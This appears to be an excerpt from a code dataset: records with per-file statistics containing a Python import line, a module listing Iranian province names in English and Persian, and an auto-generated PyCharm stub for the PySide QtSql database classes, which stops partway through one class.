from api.tweet.post import handler as post
| 28 | 42 | 0.809524 | 16 | 84 | 4.25 | 0.5 | 0.205882 | 0.352941 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 84 | 2 | 43 | 42 | 0.944444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
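`aws/main.py` above only re-exports two handlers under distinct names. A sketch of how such re-exported handlers are typically dispatched by method (the handler signatures and return shapes here are hypothetical, not taken from the repo):

```python
# Stand-ins for api.tweet.get.handler and api.tweet.post.handler.
def get(event, context):
    return {'statusCode': 200, 'body': 'list tweets'}

def post(event, context):
    return {'statusCode': 201, 'body': 'tweet created'}

# Route on the HTTP method carried in the event payload.
ROUTES = {'GET': get, 'POST': post}

def dispatch(event, context=None):
    handler = ROUTES[event.get('httpMethod', 'GET')]
    return handler(event, context)
```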
9ff7c86e37b9f9a3090e1d184fe587aacac905a6 | 1,934 | py | Python | bot/Utils/States.py | ehsanbarkhordar/bot_141 | 6104411339a2607efe477077e9ddab6c441573da | [
"Apache-2.0"
] | null | null | null | bot/Utils/States.py | ehsanbarkhordar/bot_141 | 6104411339a2607efe477077e9ddab6c441573da | [
"Apache-2.0"
] | null | null | null | bot/Utils/States.py | ehsanbarkhordar/bot_141 | 6104411339a2607efe477077e9ddab6c441573da | [
"Apache-2.0"
] | null | null | null | states_names = ["AzarbayjanSharghi", "AzarbayjanGharbi", "Ardebil", "Esfehan", "Alborz", "Ilam", "Boshehr", "tehran",
                "chaharmahalbakhtiari", "KhorasanJonoobi",
                "KhorasanRazavi", "KhorasanShomali", "Khozestan", "Zanjan", "Semnan", "SistanBalochestan", "Fars",
                "Ghazvin", "qom", "Kordestan",
                "Kerman", "KermanShah", "kohkilooyehVaBoyerAhmad", "Golestan", "Gilan", "Lorestan", "Mazandaran",
                "Markazi", "Hormozgan", "Hamedan", "Yazd"]
states_views = ["آذربایجانشرقی", "آذربایجانغربی", "اردبیل", "اصفهان",
                "البرز", "ایلام", "بوشهر", "تهران", "چهارمحالبختیاری",
                "خراسانجنوبی", "خراسانرضوی", "خراسانشمالی", "خوزستان", "زنجان",
                "سمنان", "سیستانوبلوچستان", "فارس", "قزوین", "قم", "کردستان", "کرمان",
                "کرمانشاه", "کهکیلویهوبویراحمد", "گلستان", "گیلان", "لرستان", "مازندران",
                "مرکزی", "هرمزگان", "همدان", "یزد"]


class States:
    states_names = ["AzarbayjanSharghi", "AzarbayjanGharbi", "Ardebil", "Esfehan", "Alborz", "Ilam", "Boshehr",
                    "tehran",
                    "chaharmahalbakhtiari", "KhorasanJonoobi",
                    "KhorasanRazavi", "KhorasanShomali", "Khozestan", "Zanjan", "Semnan", "SistanBalochestan", "Fars",
                    "Ghazvin", "qom", "Kordestan",
                    "Kerman", "KermanShah", "kohkilooyehVaBoyerAhmad", "Golestan", "Gilan", "Lorestan", "Mazandaran",
                    "Markazi", "Hormozgan", "Hamedan", "Yazd"]
    states_views = ["آذربایجانشرقی", "آذربایجانغربی", "اردبیل", "اصفهان",
                    "البرز", "ایلام", "بوشهر", "تهران", "چهارمحالبختیاری",
                    "خراسانجنوبی", "خراسانرضوی", "خراسانشمالی", "خوزستان", "زنجان",
                    "سمنان", "سیستانوبلوچستان", "فارس", "قزوین", "قم", "کردستان", "کرمان",
                    "کرمانشاه", "کهکیلویهوبویراحمد", "گلستان", "گیلان", "لرستان", "مازندران",
                    "مرکزی", "هرمزگان", "همدان", "یزد"]
| 49.589744 | 118 | 0.570321 | 166 | 1,934 | 6.716867 | 0.433735 | 0.037668 | 0.050224 | 0.078924 | 0.990135 | 0.990135 | 0.990135 | 0.990135 | 0.990135 | 0.990135 | 0 | 0 | 0.224405 | 1,934 | 38 | 119 | 50.894737 | 0.732667 | 0 | 0 | 0.846154 | 0 | 0 | 0.550363 | 0.023884 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
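`States.py` keeps two parallel lists: Latin identifiers and their Persian display strings. A small sketch of collapsing them into one lookup table, assuming the lists stay equal in length and order (abbreviated three-item samples stand in for the full 31-province lists):

```python
# Abbreviated samples of the parallel lists from States.py.
states_names = ["tehran", "Fars", "Gilan"]
states_views = ["تهران", "فارس", "گیلان"]

# zip pairs each identifier with its display string by position.
name_to_view = dict(zip(states_names, states_views))
```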
c694ca06c32b5537133007532f05726129c2dec7 | 37,775 | py | Python | resources/dot_PyCharm/system/python_stubs/-762174762/PySide/QtSql.py | basepipe/developer_onboarding | 05b6a776f8974c89517868131b201f11c6c2a5ad | [
"MIT"
] | 1 | 2020-04-20T02:27:20.000Z | 2020-04-20T02:27:20.000Z | resources/dot_PyCharm/system/python_stubs/cache/b187d1132e7eb3c246068580bb9c6db99581945459c2ea08b49263404fd1b91f/PySide/QtSql.py | basepipe/developer_onboarding | 05b6a776f8974c89517868131b201f11c6c2a5ad | [
"MIT"
] | null | null | null | resources/dot_PyCharm/system/python_stubs/cache/b187d1132e7eb3c246068580bb9c6db99581945459c2ea08b49263404fd1b91f/PySide/QtSql.py | basepipe/developer_onboarding | 05b6a776f8974c89517868131b201f11c6c2a5ad | [
"MIT"
] | null | null | null | # encoding: utf-8
# module PySide.QtSql
# from C:\Python27\lib\site-packages\PySide\QtSql.pyd
# by generator 1.147
# no doc
# imports
import PySide.QtCore as __PySide_QtCore
import PySide.QtGui as __PySide_QtGui
import Shiboken as __Shiboken
# no functions
# classes
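The QtSql classes stubbed below wrap a familiar open, execute, iterate flow (QSqlDatabase for connections, QSqlQuery for statements). A stdlib `sqlite3` sketch shows the same shape without requiring PySide; the table and data here are illustrative only:

```python
import sqlite3

# open (QSqlDatabase.addDatabase/open analogue)
conn = sqlite3.connect(':memory:')

# execute (QSqlQuery.exec_ analogue)
conn.execute('CREATE TABLE person (id INTEGER PRIMARY KEY, name TEXT)')
conn.execute("INSERT INTO person (name) VALUES ('Ada')")

# iterate over results (QSqlQuery.next/value analogue)
names = [row[0] for row in conn.execute('SELECT name FROM person')]

conn.close()
```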
class QSql(__Shiboken.Object):
    # no doc
    def __init__(self, *args, **kwargs): # real signature unknown
        pass

    AfterLastRow = PySide.QtSql.QSql.Location.AfterLastRow
    AllTables = PySide.QtSql.QSql.TableType.AllTables
    BeforeFirstRow = PySide.QtSql.QSql.Location.BeforeFirstRow
    Binary = PySide.QtSql.QSql.ParamTypeFlag.Binary
    HighPrecision = PySide.QtSql.QSql.NumericalPrecisionPolicy.HighPrecision
    In = PySide.QtSql.QSql.ParamTypeFlag.In
    InOut = PySide.QtSql.QSql.ParamTypeFlag.InOut
    Location = None # (!) real value is "<type 'PySide.QtSql.QSql.Location'>"
    LowPrecisionDouble = PySide.QtSql.QSql.NumericalPrecisionPolicy.LowPrecisionDouble
    LowPrecisionInt32 = PySide.QtSql.QSql.NumericalPrecisionPolicy.LowPrecisionInt32
    LowPrecisionInt64 = PySide.QtSql.QSql.NumericalPrecisionPolicy.LowPrecisionInt64
    NumericalPrecisionPolicy = None # (!) real value is "<type 'PySide.QtSql.QSql.NumericalPrecisionPolicy'>"
    Out = PySide.QtSql.QSql.ParamTypeFlag.Out
    ParamType = None # (!) real value is "<type 'ParamType'>"
    ParamTypeFlag = None # (!) real value is "<type 'PySide.QtSql.QSql.ParamTypeFlag'>"
    SystemTables = PySide.QtSql.QSql.TableType.SystemTables
    Tables = PySide.QtSql.QSql.TableType.Tables
    TableType = None # (!) real value is "<type 'PySide.QtSql.QSql.TableType'>"
    Views = PySide.QtSql.QSql.TableType.Views

class QSqlDatabase(__Shiboken.Object):
    # no doc
    def addDatabase(self, *args, **kwargs): # real signature unknown
        pass
    def cloneDatabase(self, *args, **kwargs): # real signature unknown
        pass
    def close(self, *args, **kwargs): # real signature unknown
        pass
    def commit(self, *args, **kwargs): # real signature unknown
        pass
    def connectionName(self, *args, **kwargs): # real signature unknown
        pass
    def connectionNames(self, *args, **kwargs): # real signature unknown
        pass
    def connectOptions(self, *args, **kwargs): # real signature unknown
        pass
    def contains(self, *args, **kwargs): # real signature unknown
        pass
    def database(self, *args, **kwargs): # real signature unknown
        pass
    def databaseName(self, *args, **kwargs): # real signature unknown
        pass
    def driver(self, *args, **kwargs): # real signature unknown
        pass
    def driverName(self, *args, **kwargs): # real signature unknown
        pass
    def drivers(self, *args, **kwargs): # real signature unknown
        pass
    def exec_(self, *args, **kwargs): # real signature unknown
        pass
    def hostName(self, *args, **kwargs): # real signature unknown
        pass
    def isDriverAvailable(self, *args, **kwargs): # real signature unknown
        pass
    def isOpen(self, *args, **kwargs): # real signature unknown
        pass
    def isOpenError(self, *args, **kwargs): # real signature unknown
        pass
    def isValid(self, *args, **kwargs): # real signature unknown
        pass
    def lastError(self, *args, **kwargs): # real signature unknown
        pass
    def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
        pass
    def open(self, *args, **kwargs): # real signature unknown
        pass
    def password(self, *args, **kwargs): # real signature unknown
        pass
    def port(self, *args, **kwargs): # real signature unknown
        pass
    def primaryIndex(self, *args, **kwargs): # real signature unknown
        pass
    def record(self, *args, **kwargs): # real signature unknown
        pass
    def registerSqlDriver(self, *args, **kwargs): # real signature unknown
        pass
    def removeDatabase(self, *args, **kwargs): # real signature unknown
        pass
    def rollback(self, *args, **kwargs): # real signature unknown
        pass
    def setConnectOptions(self, *args, **kwargs): # real signature unknown
        pass
    def setDatabaseName(self, *args, **kwargs): # real signature unknown
        pass
    def setHostName(self, *args, **kwargs): # real signature unknown
        pass
    def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
        pass
    def setPassword(self, *args, **kwargs): # real signature unknown
        pass
    def setPort(self, *args, **kwargs): # real signature unknown
        pass
    def setUserName(self, *args, **kwargs): # real signature unknown
        pass
    def tables(self, *args, **kwargs): # real signature unknown
        pass
    def transaction(self, *args, **kwargs): # real signature unknown
        pass
    def userName(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __repr__(self): # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass

    defaultConnection = 'qt_sql_default_connection'

class QSqlDriver(__PySide_QtCore.QObject):
    # no doc
    def beginTransaction(self, *args, **kwargs): # real signature unknown
        pass
    def close(self, *args, **kwargs): # real signature unknown
        pass
    def commitTransaction(self, *args, **kwargs): # real signature unknown
        pass
    def createResult(self, *args, **kwargs): # real signature unknown
        pass
    def escapeIdentifier(self, *args, **kwargs): # real signature unknown
        pass
    def formatValue(self, *args, **kwargs): # real signature unknown
        pass
    def hasFeature(self, *args, **kwargs): # real signature unknown
        pass
    def isIdentifierEscaped(self, *args, **kwargs): # real signature unknown
        pass
    def isIdentifierEscapedImplementation(self, *args, **kwargs): # real signature unknown
        pass
    def isOpen(self, *args, **kwargs): # real signature unknown
        pass
    def isOpenError(self, *args, **kwargs): # real signature unknown
        pass
    def lastError(self, *args, **kwargs): # real signature unknown
        pass
    def notification(self, *args, **kwargs): # real signature unknown
        """ Signal """
        pass
    def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
        pass
    def open(self, *args, **kwargs): # real signature unknown
        pass
    def primaryIndex(self, *args, **kwargs): # real signature unknown
        pass
    def record(self, *args, **kwargs): # real signature unknown
        pass
    def rollbackTransaction(self, *args, **kwargs): # real signature unknown
        pass
    def setLastError(self, *args, **kwargs): # real signature unknown
        pass
    def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
        pass
    def setOpen(self, *args, **kwargs): # real signature unknown
        pass
    def setOpenError(self, *args, **kwargs): # real signature unknown
        pass
    def sqlStatement(self, *args, **kwargs): # real signature unknown
        pass
    def stripDelimiters(self, *args, **kwargs): # real signature unknown
        pass
    def stripDelimitersImplementation(self, *args, **kwargs): # real signature unknown
        pass
    def subscribedToNotifications(self, *args, **kwargs): # real signature unknown
        pass
    def subscribedToNotificationsImplementation(self, *args, **kwargs): # real signature unknown
        pass
    def subscribeToNotification(self, *args, **kwargs): # real signature unknown
        pass
    def subscribeToNotificationImplementation(self, *args, **kwargs): # real signature unknown
        pass
    def tables(self, *args, **kwargs): # real signature unknown
        pass
    def unsubscribeFromNotification(self, *args, **kwargs): # real signature unknown
        pass
    def unsubscribeFromNotificationImplementation(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    BatchOperations = PySide.QtSql.QSqlDriver.DriverFeature.BatchOperations
    BLOB = PySide.QtSql.QSqlDriver.DriverFeature.BLOB
    DeleteStatement = PySide.QtSql.QSqlDriver.StatementType.DeleteStatement
    DriverFeature = None # (!) real value is "<type 'PySide.QtSql.QSqlDriver.DriverFeature'>"
    EventNotifications = PySide.QtSql.QSqlDriver.DriverFeature.EventNotifications
    FieldName = PySide.QtSql.QSqlDriver.IdentifierType.FieldName
    FinishQuery = PySide.QtSql.QSqlDriver.DriverFeature.FinishQuery
    IdentifierType = None # (!) real value is "<type 'PySide.QtSql.QSqlDriver.IdentifierType'>"
    InsertStatement = PySide.QtSql.QSqlDriver.StatementType.InsertStatement
    LastInsertId = PySide.QtSql.QSqlDriver.DriverFeature.LastInsertId
    LowPrecisionNumbers = PySide.QtSql.QSqlDriver.DriverFeature.LowPrecisionNumbers
    MultipleResultSets = PySide.QtSql.QSqlDriver.DriverFeature.MultipleResultSets
    NamedPlaceholders = PySide.QtSql.QSqlDriver.DriverFeature.NamedPlaceholders
    PositionalPlaceholders = PySide.QtSql.QSqlDriver.DriverFeature.PositionalPlaceholders
    PreparedQueries = PySide.QtSql.QSqlDriver.DriverFeature.PreparedQueries
    QuerySize = PySide.QtSql.QSqlDriver.DriverFeature.QuerySize
    SelectStatement = PySide.QtSql.QSqlDriver.StatementType.SelectStatement
    SimpleLocking = PySide.QtSql.QSqlDriver.DriverFeature.SimpleLocking
    StatementType = None # (!) real value is "<type 'PySide.QtSql.QSqlDriver.StatementType'>"
    staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x000000000476BB48>'
    TableName = PySide.QtSql.QSqlDriver.IdentifierType.TableName
    Transactions = PySide.QtSql.QSqlDriver.DriverFeature.Transactions
    Unicode = PySide.QtSql.QSqlDriver.DriverFeature.Unicode
    UpdateStatement = PySide.QtSql.QSqlDriver.StatementType.UpdateStatement
    WhereStatement = PySide.QtSql.QSqlDriver.StatementType.WhereStatement

class QSqlDriverCreatorBase(__Shiboken.Object):
    # no doc
    def createObject(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

class QSqlError(__Shiboken.Object):
    # no doc
    def databaseText(self, *args, **kwargs): # real signature unknown
        pass
    def driverText(self, *args, **kwargs): # real signature unknown
        pass
    def isValid(self, *args, **kwargs): # real signature unknown
        pass
    def number(self, *args, **kwargs): # real signature unknown
        pass
    def setDatabaseText(self, *args, **kwargs): # real signature unknown
        pass
    def setDriverText(self, *args, **kwargs): # real signature unknown
        pass
    def setNumber(self, *args, **kwargs): # real signature unknown
        pass
    def setType(self, *args, **kwargs): # real signature unknown
        pass
    def text(self, *args, **kwargs): # real signature unknown
        pass
    def type(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __repr__(self): # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass

    ConnectionError = PySide.QtSql.QSqlError.ErrorType.ConnectionError
    ErrorType = None # (!) real value is "<type 'PySide.QtSql.QSqlError.ErrorType'>"
    NoError = PySide.QtSql.QSqlError.ErrorType.NoError
    StatementError = PySide.QtSql.QSqlError.ErrorType.StatementError
    TransactionError = PySide.QtSql.QSqlError.ErrorType.TransactionError
    UnknownError = PySide.QtSql.QSqlError.ErrorType.UnknownError

class QSqlField(__Shiboken.Object):
    # no doc
    def clear(self, *args, **kwargs): # real signature unknown
        pass
    def defaultValue(self, *args, **kwargs): # real signature unknown
        pass
    def isAutoValue(self, *args, **kwargs): # real signature unknown
        pass
    def isGenerated(self, *args, **kwargs): # real signature unknown
        pass
    def isNull(self, *args, **kwargs): # real signature unknown
        pass
    def isReadOnly(self, *args, **kwargs): # real signature unknown
        pass
    def isValid(self, *args, **kwargs): # real signature unknown
        pass
    def length(self, *args, **kwargs): # real signature unknown
        pass
    def name(self, *args, **kwargs): # real signature unknown
        pass
    def precision(self, *args, **kwargs): # real signature unknown
        pass
    def requiredStatus(self, *args, **kwargs): # real signature unknown
        pass
    def setAutoValue(self, *args, **kwargs): # real signature unknown
        pass
    def setDefaultValue(self, *args, **kwargs): # real signature unknown
        pass
    def setGenerated(self, *args, **kwargs): # real signature unknown
        pass
    def setLength(self, *args, **kwargs): # real signature unknown
        pass
    def setName(self, *args, **kwargs): # real signature unknown
        pass
    def setPrecision(self, *args, **kwargs): # real signature unknown
        pass
    def setReadOnly(self, *args, **kwargs): # real signature unknown
        pass
    def setRequired(self, *args, **kwargs): # real signature unknown
        pass
    def setRequiredStatus(self, *args, **kwargs): # real signature unknown
        pass
    def setSqlType(self, *args, **kwargs): # real signature unknown
        pass
    def setType(self, *args, **kwargs): # real signature unknown
        pass
    def setValue(self, *args, **kwargs): # real signature unknown
        pass
    def type(self, *args, **kwargs): # real signature unknown
        pass
    def typeID(self, *args, **kwargs): # real signature unknown
        pass
    def value(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __eq__(self, y): # real signature unknown; restored from __doc__
        """ x.__eq__(y) <==> x==y """
        pass
    def __ge__(self, y): # real signature unknown; restored from __doc__
        """ x.__ge__(y) <==> x>=y """
        pass
    def __gt__(self, y): # real signature unknown; restored from __doc__
        """ x.__gt__(y) <==> x>y """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    def __le__(self, y): # real signature unknown; restored from __doc__
        """ x.__le__(y) <==> x<=y """
        pass
    def __lt__(self, y): # real signature unknown; restored from __doc__
        """ x.__lt__(y) <==> x<y """
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __ne__(self, y): # real signature unknown; restored from __doc__
        """ x.__ne__(y) <==> x!=y """
        pass
    def __nonzero__(self): # real signature unknown; restored from __doc__
        """ x.__nonzero__() <==> x != 0 """
        pass
    def __repr__(self): # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass

    Optional = PySide.QtSql.QSqlField.RequiredStatus.Optional
    Required = PySide.QtSql.QSqlField.RequiredStatus.Required
    RequiredStatus = None # (!) real value is "<type 'PySide.QtSql.QSqlField.RequiredStatus'>"
    Unknown = PySide.QtSql.QSqlField.RequiredStatus.Unknown

class QSqlRecord(__Shiboken.Object):
    # no doc
    def append(self, *args, **kwargs): # real signature unknown
        pass
    def clear(self, *args, **kwargs): # real signature unknown
        pass
    def clearValues(self, *args, **kwargs): # real signature unknown
        pass
    def contains(self, *args, **kwargs): # real signature unknown
        pass
    def count(self, *args, **kwargs): # real signature unknown
        pass
    def field(self, *args, **kwargs): # real signature unknown
        pass
    def fieldName(self, *args, **kwargs): # real signature unknown
        pass
    def indexOf(self, *args, **kwargs): # real signature unknown
        pass
    def insert(self, *args, **kwargs): # real signature unknown
        pass
    def isEmpty(self, *args, **kwargs): # real signature unknown
        pass
    def isGenerated(self, *args, **kwargs): # real signature unknown
        pass
    def isNull(self, *args, **kwargs): # real signature unknown
        pass
    def remove(self, *args, **kwargs): # real signature unknown
        pass
    def replace(self, *args, **kwargs): # real signature unknown
        pass
    def setGenerated(self, *args, **kwargs): # real signature unknown
        pass
    def setNull(self, *args, **kwargs): # real signature unknown
        pass
    def setValue(self, *args, **kwargs): # real signature unknown
        pass
    def value(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __eq__(self, y): # real signature unknown; restored from __doc__
        """ x.__eq__(y) <==> x==y """
        pass
    def __ge__(self, y): # real signature unknown; restored from __doc__
        """ x.__ge__(y) <==> x>=y """
        pass
    def __gt__(self, y): # real signature unknown; restored from __doc__
        """ x.__gt__(y) <==> x>y """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    def __le__(self, y): # real signature unknown; restored from __doc__
        """ x.__le__(y) <==> x<=y """
        pass
    def __lt__(self, y): # real signature unknown; restored from __doc__
        """ x.__lt__(y) <==> x<y """
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass
    def __ne__(self, y): # real signature unknown; restored from __doc__
        """ x.__ne__(y) <==> x!=y """
        pass
    def __repr__(self): # real signature unknown; restored from __doc__
        """ x.__repr__() <==> repr(x) """
        pass

class QSqlIndex(QSqlRecord):
    # no doc
    def append(self, *args, **kwargs): # real signature unknown
        pass
    def cursorName(self, *args, **kwargs): # real signature unknown
        pass
    def isDescending(self, *args, **kwargs): # real signature unknown
        pass
    def name(self, *args, **kwargs): # real signature unknown
        pass
    def setCursorName(self, *args, **kwargs): # real signature unknown
        pass
    def setDescending(self, *args, **kwargs): # real signature unknown
        pass
    def setName(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

class QSqlQuery(__Shiboken.Object):
    # no doc
    def addBindValue(self, *args, **kwargs): # real signature unknown
        pass
    def at(self, *args, **kwargs): # real signature unknown
        pass
    def bindValue(self, *args, **kwargs): # real signature unknown
        pass
    def boundValue(self, *args, **kwargs): # real signature unknown
        pass
    def boundValues(self, *args, **kwargs): # real signature unknown
        pass
    def clear(self, *args, **kwargs): # real signature unknown
        pass
    def driver(self, *args, **kwargs): # real signature unknown
        pass
    def execBatch(self, *args, **kwargs): # real signature unknown
        pass
    def executedQuery(self, *args, **kwargs): # real signature unknown
        pass
    def exec_(self, *args, **kwargs): # real signature unknown
        pass
    def finish(self, *args, **kwargs): # real signature unknown
        pass
    def first(self, *args, **kwargs): # real signature unknown
        pass
    def isActive(self, *args, **kwargs): # real signature unknown
        pass
    def isForwardOnly(self, *args, **kwargs): # real signature unknown
        pass
    def isNull(self, *args, **kwargs): # real signature unknown
        pass
    def isSelect(self, *args, **kwargs): # real signature unknown
        pass
    def isValid(self, *args, **kwargs): # real signature unknown
        pass
    def last(self, *args, **kwargs): # real signature unknown
        pass
    def lastError(self, *args, **kwargs): # real signature unknown
        pass
    def lastInsertId(self, *args, **kwargs): # real signature unknown
        pass
    def lastQuery(self, *args, **kwargs): # real signature unknown
        pass
    def next(self, *args, **kwargs): # real signature unknown
        pass
    def nextResult(self, *args, **kwargs): # real signature unknown
        pass
    def numericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
        pass
    def numRowsAffected(self, *args, **kwargs): # real signature unknown
        pass
    def prepare(self, *args, **kwargs): # real signature unknown
        pass
    def previous(self, *args, **kwargs): # real signature unknown
        pass
    def record(self, *args, **kwargs): # real signature unknown
        pass
    def result(self, *args, **kwargs): # real signature unknown
        pass
    def seek(self, *args, **kwargs): # real signature unknown
        pass
    def setForwardOnly(self, *args, **kwargs): # real signature unknown
        pass
    def setNumericalPrecisionPolicy(self, *args, **kwargs): # real signature unknown
        pass
    def size(self, *args, **kwargs): # real signature unknown
        pass
    def value(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    BatchExecutionMode = None # (!) real value is "<type 'PySide.QtSql.QSqlQuery.BatchExecutionMode'>"
    ValuesAsColumns = PySide.QtSql.QSqlQuery.BatchExecutionMode.ValuesAsColumns
    ValuesAsRows = PySide.QtSql.QSqlQuery.BatchExecutionMode.ValuesAsRows

class QSqlQueryModel(__PySide_QtCore.QAbstractTableModel):
    # no doc
    def canFetchMore(self, *args, **kwargs): # real signature unknown
        pass
    def clear(self, *args, **kwargs): # real signature unknown
        pass
    def columnCount(self, *args, **kwargs): # real signature unknown
        pass
    def data(self, *args, **kwargs): # real signature unknown
        pass
    def fetchMore(self, *args, **kwargs): # real signature unknown
        pass
    def headerData(self, *args, **kwargs): # real signature unknown
        pass
    def indexInQuery(self, *args, **kwargs): # real signature unknown
        pass
    def insertColumns(self, *args, **kwargs): # real signature unknown
        pass
    def lastError(self, *args, **kwargs): # real signature unknown
        pass
    def query(self, *args, **kwargs): # real signature unknown
        pass
    def queryChange(self, *args, **kwargs): # real signature unknown
        pass
    def record(self, *args, **kwargs): # real signature unknown
        pass
    def removeColumns(self, *args, **kwargs): # real signature unknown
        pass
    def rowCount(self, *args, **kwargs): # real signature unknown
        pass
    def setHeaderData(self, *args, **kwargs): # real signature unknown
        pass
    def setLastError(self, *args, **kwargs): # real signature unknown
        pass
    def setQuery(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x00000000047E1548>'

class QSqlRelation(__Shiboken.Object):
    # no doc
    def displayColumn(self, *args, **kwargs): # real signature unknown
        pass
    def indexColumn(self, *args, **kwargs): # real signature unknown
        pass
    def isValid(self, *args, **kwargs): # real signature unknown
        pass
    def tableName(self, *args, **kwargs): # real signature unknown
        pass
    def __copy__(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

class QSqlRelationalDelegate(__PySide_QtGui.QItemDelegate):
    # no doc
    def createEditor(self, *args, **kwargs): # real signature unknown
        pass
    def setEditorData(self, *args, **kwargs): # real signature unknown
        pass
    def setModelData(self, *args, **kwargs): # real signature unknown
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    @staticmethod # known case of __new__
    def __new__(S, *more): # real signature unknown; restored from __doc__
        """ T.__new__(S, ...) -> a new object with type S, a subtype of T """
        pass

    staticMetaObject = None # (!) real value is '<PySide.QtCore.QMetaObject object at 0x000000000476BD08>'

class QSqlTableModel(QSqlQueryModel):
# no doc
def beforeDelete(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def beforeInsert(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def beforeUpdate(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def clear(self, *args, **kwargs): # real signature unknown
pass
def data(self, *args, **kwargs): # real signature unknown
pass
def database(self, *args, **kwargs): # real signature unknown
pass
def deleteRowFromTable(self, *args, **kwargs): # real signature unknown
pass
def editStrategy(self, *args, **kwargs): # real signature unknown
pass
def fieldIndex(self, *args, **kwargs): # real signature unknown
pass
def filter(self, *args, **kwargs): # real signature unknown
pass
def flags(self, *args, **kwargs): # real signature unknown
pass
def headerData(self, *args, **kwargs): # real signature unknown
pass
def indexInQuery(self, *args, **kwargs): # real signature unknown
pass
def insertRecord(self, *args, **kwargs): # real signature unknown
pass
def insertRowIntoTable(self, *args, **kwargs): # real signature unknown
pass
def insertRows(self, *args, **kwargs): # real signature unknown
pass
def isDirty(self, *args, **kwargs): # real signature unknown
pass
def orderByClause(self, *args, **kwargs): # real signature unknown
pass
def primaryKey(self, *args, **kwargs): # real signature unknown
pass
def primeInsert(self, *args, **kwargs): # real signature unknown
""" Signal """
pass
def removeColumns(self, *args, **kwargs): # real signature unknown
pass
def removeRows(self, *args, **kwargs): # real signature unknown
pass
def revert(self, *args, **kwargs): # real signature unknown
pass
def revertAll(self, *args, **kwargs): # real signature unknown
pass
def revertRow(self, *args, **kwargs): # real signature unknown
pass
def rowCount(self, *args, **kwargs): # real signature unknown
pass
def select(self, *args, **kwargs): # real signature unknown
pass
def selectStatement(self, *args, **kwargs): # real signature unknown
pass
